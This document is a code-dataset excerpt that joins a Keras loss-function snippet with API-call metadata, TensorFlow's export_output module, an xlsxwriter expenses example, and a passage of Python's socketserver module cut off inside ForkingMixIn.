# Define a matlab like gaussian 2D filter
def matlab_style_gauss2D(shape=(7,7),sigma=1):
"""
2D gaussian filter - should give the same result as:
MATLAB's fspecial('gaussian',[shape],[sigma])
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
h.astype(dtype=K.floatx())
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
h = h*2.0
h = h.astype('float32')
return h
# Expand the filter dimensions
## We changed the kernel size from 7 to 10.
# psf_heatmap = matlab_style_gauss2D(shape=(14, 14), sigma=2)
# gfilter = tf.reshape(psf_heatmap, [14, 14, 1, 1])
# Combined MSE + L1 loss
def L1L2loss(input_shape, gfilter, strides=(1, 1)):
"""
Args:
input_shape: (512,512,1)
Returns:
"""
def bump_mse(heatmap_true, spikes_pred):
# generate the heatmap corresponding to the predicted spikes
if len(strides) == 2:
heatmap_pred = K.conv2d(spikes_pred, gfilter, strides=strides, padding='same')
elif len(strides) == 3:
heatmap_pred = K.conv3d(spikes_pred, gfilter, strides=strides, padding='same')
# heatmaps MSE
loss_heatmaps = losses.mean_squared_error(heatmap_true,heatmap_pred)
# l1 on the predicted spikes
loss_spikes = losses.mean_absolute_error(spikes_pred,tf.zeros(input_shape))
return loss_heatmaps + loss_spikes
return bump_mse
| [
"tensorflow.keras.backend.log",
"tensorflow.shape",
"tensorflow.keras.backend.floatx",
"tensorflow.keras.backend.greater",
"tensorflow.keras.backend.ones_like",
"tensorflow.keras.losses.binary_crossentropy",
"tensorflow.cast",
"tensorflow.keras.backend.conv2d",
"tensorflow.keras.backend.conv3d",
"... | [((1129, 1167), 'tensorflow.keras.backend.clip', 'K.clip', (['y_pred', 'epsilon', '(1.0 - epsilon)'], {}), '(y_pred, epsilon, 1.0 - epsilon)\n', (1135, 1167), True, 'from tensorflow.keras import backend as K\n'), ((1186, 1216), 'tensorflow.keras.backend.log', 'K.log', (['(y_pred / (1.0 - y_pred))'], {}), '(y_pred / (1.0 - y_pred))\n', (1191, 1216), True, 'from tensorflow.keras import backend as K\n'), ((1843, 1868), 'tensorflow.keras.backend.cast', 'K.cast', (['y_true', '"""float32"""'], {}), "(y_true, 'float32')\n", (1849, 1868), True, 'from tensorflow.keras import backend as K\n'), ((1882, 1907), 'tensorflow.keras.backend.cast', 'K.cast', (['y_pred', '"""float32"""'], {}), "(y_pred, 'float32')\n", (1888, 1907), True, 'from tensorflow.keras import backend as K\n'), ((2004, 2093), 'tensorflow.keras.backend.pool2d', 'K.pool2d', (['y_true'], {'pool_size': '(11, 11)', 'strides': '(1, 1)', 'padding': '"""same"""', 'pool_mode': '"""avg"""'}), "(y_true, pool_size=(11, 11), strides=(1, 1), padding='same',\n pool_mode='avg')\n", (2012, 2093), True, 'from tensorflow.keras import backend as K\n'), ((2226, 2252), 'tensorflow.keras.backend.ones_like', 'K.ones_like', (['averaged_mask'], {}), '(averaged_mask)\n', (2237, 2252), True, 'from tensorflow.keras import backend as K\n'), ((2262, 2275), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (2267, 2275), True, 'from tensorflow.keras import backend as K\n'), ((2310, 2323), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (2315, 2323), True, 'from tensorflow.keras import backend as K\n'), ((2538, 2573), 'tensorflow.keras.losses.binary_crossentropy', 'binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (2557, 2573), False, 'from tensorflow.keras.losses import binary_crossentropy\n'), ((2585, 2608), 'tensorflow.expand_dims', 'tf.expand_dims', (['loss', '(3)'], {}), '(loss, 3)\n', (2599, 2608), True, 'import tensorflow as tf\n'), ((3206, 3237), 'tensorflow.cast', 'tf.cast', (['y_pred_'], {'dtype': 'tf.int8'}), '(y_pred_, dtype=tf.int8)\n', (3213, 3237), True, 'import tensorflow as tf\n'), ((3252, 3282), 'tensorflow.cast', 'tf.cast', (['y_true'], {'dtype': 'tf.int8'}), '(y_true, dtype=tf.int8)\n', (3259, 3282), True, 'import tensorflow as tf\n'), ((3293, 3333), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (3314, 3333), True, 'import tensorflow as tf\n'), ((3343, 3389), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (1 - y_true_))'], {}), '(y_pred_ * (1 - y_true_))\n', (3364, 3389), True, 'import tensorflow as tf\n'), ((3399, 3445), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((1 - y_pred_) * y_true_)'], {}), '((1 - y_pred_) * y_true_)\n', (3420, 3445), True, 'import tensorflow as tf\n'), ((4117, 4148), 'tensorflow.cast', 'tf.cast', (['y_pred'], {'dtype': 'tf.int32'}), '(y_pred, dtype=tf.int32)\n', (4124, 4148), True, 'import tensorflow as tf\n'), ((4312, 4351), 'tensorflow.cast', 'tf.cast', (['y_true[..., 0]'], {'dtype': 'tf.int32'}), '(y_true[..., 0], dtype=tf.int32)\n', (4319, 4351), True, 'import tensorflow as tf\n'), ((4365, 4406), 'tensorflow.one_hot', 'tf.one_hot', (['y_true_', 'num_classes'], {'axis': '(-1)'}), '(y_true_, num_classes, axis=-1)\n', (4375, 4406), True, 'import tensorflow as tf\n'), ((4514, 4554), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (4535, 4554), True, 'import tensorflow as tf\n'), ((4564, 4610), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (y_true_ - 1))'], {}), '(y_pred_ * (y_true_ - 1))\n', (4585, 4610), True, 'import tensorflow as tf\n'), ((4620, 4666), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((y_pred_ - 1) * y_true_)'], {}), '((y_pred_ - 1) * y_true_)\n', (4641, 4666), True, 'import tensorflow as tf\n'), ((5380, 5413), 'tensorflow.cast', 'tf.cast', (['y_pred'], {'dtype': 'tf.float32'}), '(y_pred, dtype=tf.float32)\n', (5387, 5413), True, 'import tensorflow as tf\n'), ((5554, 5587), 'tensorflow.cast', 'tf.cast', (['y_true'], {'dtype': 'tf.float32'}), '(y_true, dtype=tf.float32)\n', (5561, 5587), True, 'import tensorflow as tf\n'), ((5750, 5790), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (5771, 5790), True, 'import tensorflow as tf\n'), ((5800, 5846), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (y_true_ - 1))'], {}), '(y_pred_ * (y_true_ - 1))\n', (5821, 5846), True, 'import tensorflow as tf\n'), ((5856, 5902), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((y_pred_ - 1) * y_true_)'], {}), '((y_pred_ - 1) * y_true_)\n', (5877, 5902), True, 'import tensorflow as tf\n'), ((6426, 6474), 'numpy.exp', 'np.exp', (['(-(x * x + y * y) / (2.0 * sigma * sigma))'], {}), '(-(x * x + y * y) / (2.0 * sigma * sigma))\n', (6432, 6474), True, 'import numpy as np\n'), ((1478, 1489), 'tensorflow.keras.backend.sum', 'K.sum', (['loss'], {}), '(loss)\n', (1483, 1489), True, 'from tensorflow.keras import backend as K\n'), ((1492, 1505), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (1497, 1505), True, 'from tensorflow.keras import backend as K\n'), ((1755, 1767), 'tensorflow.keras.backend.sum', 'K.sum', (['score'], {}), '(score)\n', (1760, 1767), True, 'from tensorflow.keras import backend as K\n'), ((3145, 3163), 'tensorflow.sigmoid', 'tf.sigmoid', (['y_pred'], {}), '(y_pred)\n', (3155, 3163), True, 'import tensorflow as tf\n'), ((3465, 3492), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (3475, 3492), True, 'import tensorflow as tf\n'), ((4022, 4038), 'tensorflow.shape', 'tf.shape', (['y_pred'], {}), '(y_pred)\n', (4030, 4038), True, 'import tensorflow as tf\n'), ((4174, 4206), 'tensorflow.math.argmax', 'tf.math.argmax', (['y_pred_'], {'axis': '(-1)'}), '(y_pred_, axis=-1)\n', (4188, 4206), True, 'import tensorflow as tf\n'), ((4686, 4713), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (4696, 4713), True, 'import tensorflow as tf\n'), ((5277, 5293), 'tensorflow.shape', 'tf.shape', (['y_true'], {}), '(y_true)\n', (5285, 5293), True, 'import tensorflow as tf\n'), ((5439, 5471), 'tensorflow.math.argmax', 'tf.math.argmax', (['y_pred_'], {'axis': '(-1)'}), '(y_pred_, axis=-1)\n', (5453, 5471), True, 'import tensorflow as tf\n'), ((5922, 5949), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (5932, 5949), True, 'import tensorflow as tf\n'), ((7406, 7459), 'tensorflow.keras.losses.mean_squared_error', 'losses.mean_squared_error', (['heatmap_true', 'heatmap_pred'], {}), '(heatmap_true, heatmap_pred)\n', (7431, 7459), False, 'from tensorflow.keras import losses\n'), ((2119, 2150), 'tensorflow.keras.backend.greater', 'K.greater', (['averaged_mask', '(0.005)'], {}), '(averaged_mask, 0.005)\n', (2128, 2150), True, 'from tensorflow.keras import backend as K\n'), ((2172, 2200), 'tensorflow.keras.backend.less', 'K.less', (['averaged_mask', '(0.995)'], {}), '(averaged_mask, 0.995)\n', (2178, 2200), True, 'from tensorflow.keras import backend as K\n'), ((3551, 3580), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (3558, 3580), True, 'import tensorflow as tf\n'), ((4772, 4801), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (4779, 4801), True, 'import tensorflow as tf\n'), ((6008, 6037), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (6015, 6037), True, 'import tensorflow as tf\n'), ((6487, 6497), 'tensorflow.keras.backend.floatx', 'K.floatx', ([], {}), '()\n', (6495, 6497), True, 'from tensorflow.keras import backend as K\n'), ((7170, 7233), 'tensorflow.keras.backend.conv2d', 'K.conv2d', (['spikes_pred', 'gfilter'], {'strides': 'strides', 'padding': '"""same"""'}), "(spikes_pred, gfilter, strides=strides, padding='same')\n", (7178, 7233), True, 'from tensorflow.keras import backend as K\n'), ((7558, 7579), 'tensorflow.zeros', 'tf.zeros', (['input_shape'], {}), '(input_shape)\n', (7566, 7579), True, 'import tensorflow as tf\n'), ((1437, 1466), 'tensorflow.keras.backend.maximum', 'K.maximum', (['(-logit_y_pred)', '(0.0)'], {}), '(-logit_y_pred, 0.0)\n', (1446, 1466), True, 'from tensorflow.keras import backend as K\n'), ((1662, 1685), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * intersection)'], {}), '(w * intersection)\n', (1667, 1685), True, 'from tensorflow.keras import backend as K\n'), ((1699, 1712), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * m1)'], {}), '(w * m1)\n', (1704, 1712), True, 'from tensorflow.keras import backend as K\n'), ((1715, 1728), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * m2)'], {}), '(w * m2)\n', (1720, 1728), True, 'from tensorflow.keras import backend as K\n'), ((7294, 7357), 'tensorflow.keras.backend.conv3d', 'K.conv3d', (['spikes_pred', 'gfilter'], {'strides': 'strides', 'padding': '"""same"""'}), "(spikes_pred, gfilter, strides=strides, padding='same')\n", (7302, 7357), True, 'from tensorflow.keras import backend as K\n'), ((6510, 6527), 'numpy.finfo', 'np.finfo', (['h.dtype'], {}), '(h.dtype)\n', (6518, 6527), True, 'import numpy as np\n'), ((1413, 1432), 'tensorflow.keras.backend.abs', 'K.abs', (['logit_y_pred'], {}), '(logit_y_pred)\n', (1418, 1432), True, 'from tensorflow.keras import backend as K\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for different types of export output."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import signature_def_utils
class ExportOutput(object):
"""Represents an output of a model that can be served.
These typically correspond to model heads.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def as_signature_def(self, receiver_tensors):
"""Generate a SignatureDef proto for inclusion in a MetaGraphDef.
The SignatureDef will specify outputs as described in this ExportOutput,
and will use the provided receiver_tensors as inputs.
Args:
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes that will be fed.
"""
pass
class ClassificationOutput(ExportOutput):
"""Represents the output of a classification head.
Either classes or scores or both must be set.
The classes `Tensor` must provide string labels, not integer class IDs.
If only classes is set, it is interpreted as providing top-k results in
descending order.
If only scores is set, it is interpreted as providing a score for every class
in order of class ID.
If both classes and scores are set, they are interpreted as zipped, so each
score corresponds to the class at the same index. Clients should not depend
on the order of the entries.
"""
def __init__(self, scores=None, classes=None):
"""Constructor for `ClassificationOutput`.
Args:
scores: A float `Tensor` giving scores (sometimes but not always
interpretable as probabilities) for each class. May be `None`, but
only if `classes` is set. Interpretation varies-- see class doc.
classes: A string `Tensor` giving predicted class labels. May be `None`,
but only if `scores` is set. Interpretation varies-- see class doc.
Raises:
ValueError: if neither classes nor scores is set, or one of them is not a
`Tensor` with the correct dtype.
"""
if (scores is not None
and not (isinstance(scores, ops.Tensor)
and scores.dtype.is_floating)):
raise ValueError('Classification scores must be a float32 Tensor; '
'got {}'.format(scores))
if (classes is not None
and not (isinstance(classes, ops.Tensor)
and dtypes.as_dtype(classes.dtype) == dtypes.string)):
raise ValueError('Classification classes must be a string Tensor; '
'got {}'.format(classes))
if scores is None and classes is None:
raise ValueError('At least one of scores and classes must be set.')
self._scores = scores
self._classes = classes
@property
def scores(self):
return self._scores
@property
def classes(self):
return self._classes
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.classification_signature_def(
examples, self.classes, self.scores)
class RegressionOutput(ExportOutput):
"""Represents the output of a regression head."""
def __init__(self, value):
"""Constructor for `RegressionOutput`.
Args:
value: a float `Tensor` giving the predicted values. Required.
Raises:
ValueError: if the value is not a `Tensor` with dtype tf.float32.
"""
if not (isinstance(value, ops.Tensor) and value.dtype.is_floating):
raise ValueError('Regression output value must be a float32 Tensor; '
'got {}'.format(value))
self._value = value
@property
def value(self):
return self._value
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.regression_signature_def(examples, self.value)
class PredictOutput(ExportOutput):
"""Represents the output of a generic prediction head.
A generic prediction need not be either a classification or a regression.
Named outputs must be provided as a dict from string to `Tensor`,
"""
def __init__(self, outputs):
"""Constructor for PredictOutput.
Args:
outputs: A dict of string to `Tensor` representing the predictions.
Raises:
ValueError: if the outputs is not dict, or any of its keys are not
strings, or any of its values are not `Tensor`s.
"""
if not isinstance(outputs, dict):
raise ValueError(
'Prediction outputs must be given as a dict of string to Tensor; '
'got {}'.format(outputs))
for key, value in outputs.items():
if not isinstance(key, six.string_types):
raise ValueError(
'Prediction output key must be a string; got {}.'.format(key))
if not isinstance(value, ops.Tensor):
raise ValueError(
'Prediction output value must be a Tensor; got {}.'.format(value))
self._outputs = outputs
@property
def outputs(self):
return self._outputs
def as_signature_def(self, receiver_tensors):
return signature_def_utils.predict_signature_def(receiver_tensors,
self.outputs)
| [
"tensorflow.python.saved_model.signature_def_utils.regression_signature_def",
"tensorflow.python.framework.dtypes.as_dtype",
"tensorflow.python.saved_model.signature_def_utils.classification_signature_def",
"tensorflow.python.saved_model.signature_def_utils.predict_signature_def"
] | [((4153, 4242), 'tensorflow.python.saved_model.signature_def_utils.classification_signature_def', 'signature_def_utils.classification_signature_def', (['examples', 'self.classes', 'self.scores'], {}), '(examples, self.classes,\n self.scores)\n', (4201, 4242), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((5325, 5391), 'tensorflow.python.saved_model.signature_def_utils.regression_signature_def', 'signature_def_utils.regression_signature_def', (['examples', 'self.value'], {}), '(examples, self.value)\n', (5369, 5391), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((6605, 6678), 'tensorflow.python.saved_model.signature_def_utils.predict_signature_def', 'signature_def_utils.predict_signature_def', (['receiver_tensors', 'self.outputs'], {}), '(receiver_tensors, self.outputs)\n', (6646, 6678), False, 'from tensorflow.python.saved_model import signature_def_utils\n'), ((3955, 3986), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['examples.dtype'], {}), '(examples.dtype)\n', (3970, 3986), False, 'from tensorflow.python.framework import dtypes\n'), ((5131, 5162), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['examples.dtype'], {}), '(examples.dtype)\n', (5146, 5162), False, 'from tensorflow.python.framework import dtypes\n'), ((3219, 3249), 'tensorflow.python.framework.dtypes.as_dtype', 'dtypes.as_dtype', (['classes.dtype'], {}), '(classes.dtype)\n', (3234, 3249), False, 'from tensorflow.python.framework import dtypes\n')] |
import xlsxwriter
# Create a workbook and add a worksheet.
workbook = xlsxwriter.Workbook('Expenses01.xlsx')
worksheet = workbook.add_worksheet()
# Some data we want to write to the worksheet.
expenses = (
['Rent', 1000],
['Gas', 100],
['Food', 300],
['Gym', 50],
)
# Start from the first cell. Rows and columns are zero indexed.
row = 0
col = 0
# Iterate over the data and write it out row by row.
for item, cost in (expenses):
worksheet.write(row, col, item)
worksheet.write(row, col + 1, cost)
row += 1
# Write a total using a formula.
worksheet.write(row, 0, 'Total')
worksheet.write(row, 1, '=SUM(B1:B4)')
workbook.close()
| [
"xlsxwriter.Workbook"
] | [((71, 109), 'xlsxwriter.Workbook', 'xlsxwriter.Workbook', (['"""Expenses01.xlsx"""'], {}), "('Expenses01.xlsx')\n", (90, 109), False, 'import xlsxwriter\n')] |
"""Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use a selector to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 <NAME> <<EMAIL>>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: <NAME>
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import selectors
import os
import errno
try:
import threading
except ImportError:
import dummy_threading as threading
try:
from time import monotonic as time
except ImportError:
from time import time as time
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
# poll/select have the advantage of not requiring any extra file descriptor,
# contrarily to epoll/kqueue (also, they require a single syscall).
if hasattr(selectors, 'PollSelector'):
_ServerSelector = selectors.PollSelector
else:
_ServerSelector = selectors.SelectSelector
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for selector
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- service_actions()
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__is_shut_down.clear()
try:
# XXX: Consider using another file descriptor or connecting to the
# socket to wake this up instead of polling. Polling reduces our
# responsiveness to a shutdown request and wastes cpu at all other
# times.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while not self.__shutdown_request:
ready = selector.select(poll_interval)
if ready:
self._handle_request_noblock()
self.service_actions()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
def service_actions(self):
"""Called by the serve_forever() loop.
May be overridden by a subclass / Mixin to implement any code that
needs to be run during the loop.
"""
pass
# The distinction between handling, getting, processing and finishing a
# request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls selector.select(),
# get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process or create a
# new thread to finish the request
# - finish_request() instantiates the request handler class; this
# constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
if timeout is not None:
deadline = time() + timeout
# Wait until a request arrives or the timeout expires - the loop is
# necessary to accomodate early wakeups due to EINTR.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while True:
ready = selector.select(timeout)
if ready:
return self._handle_request_noblock()
else:
if timeout is not None:
timeout = deadline - time()
if timeout < 0:
return self.handle_timeout()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that selector.select() has returned that the socket is
readable before this function was called, so there should be no risk of
blocking in get_request().
"""
try:
request, client_address = self.get_request()
except OSError:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print('-'*40)
print('Exception happened during processing of request from', end=' ')
print(client_address)
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print('-'*40)
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for selector
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by selector.
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except OSError:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None: return
while len(self.active_children) >= self.max_children:
# XXX: This will wait for any child process, not just ones
# spawned by this library. This could confuse other
# libraries that expect to be able to wait for their own
